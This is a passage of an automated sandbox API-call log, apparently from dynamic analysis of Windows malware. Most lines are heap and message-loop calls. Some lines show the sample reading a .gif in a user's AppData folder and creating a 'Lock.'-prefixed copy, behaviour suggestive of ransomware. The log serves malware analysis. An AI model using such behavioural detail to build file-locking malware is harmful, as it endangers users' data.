(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0207.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0207.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0207.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0207.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.014] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.014] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.014] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0207.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0207.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0207.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0207.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0207.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0207.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0207.015] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0207.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0207.015] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0207.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0207.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0207.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0207.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0207.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0207.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0207.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.016] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.016] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0207.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0207.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0207.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.016] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.017] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0207.017] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0207.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0207.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0207.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0207.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.017] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0207.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0207.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0207.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0207.017] CryptDestroyHash (hHash=0xaa5860) returned 1 [0207.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0207.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0207.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0207.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0207.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0207.018] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0207.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0207.018] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0207.018] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.018] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.018] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0207.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0207.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0207.019] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/USOrj0U79kg56B_MZLC3.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\usorj0u79kg56b_mzlc3.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0207.019] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.019] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0207.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0207.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0207.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.020] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0207.020] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0207.020] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0207.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0207.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0207.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0207.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0207.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0207.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0207.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0207.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24b30f8 [0207.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.021] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming")) returned 0x2010 [0207.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0207.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0207.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0207.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0207.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0207.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0207.022] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Lock.USOrj0U79kg56B_MZLC3.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lock.usorj0u79kg56b_mzlc3.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0207.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0207.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0207.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0207.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.023] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0207.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0207.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0207.023] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0207.023] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0207.024] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0207.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0207.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0207.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0207.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0207.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0207.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0207.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0207.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0207.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0207.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0207.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0207.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x36b0020 [0207.026] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0207.026] ReadFile (in: hFile=0x268, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0207.028] ReadFile (in: hFile=0x268, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x2283, lpOverlapped=0x0) returned 1 [0207.029] ReadFile (in: hFile=0x268, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0207.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x12283) returned 0x24c7a50 [0207.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0207.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0207.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0207.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0207.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0207.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0207.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x12283) returned 0x24d9ce0 [0207.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0207.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.032] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0207.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0207.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0207.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.032] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x12283) returned 0x24c7a50 [0207.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0207.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0207.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0207.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0207.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0207.033] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, 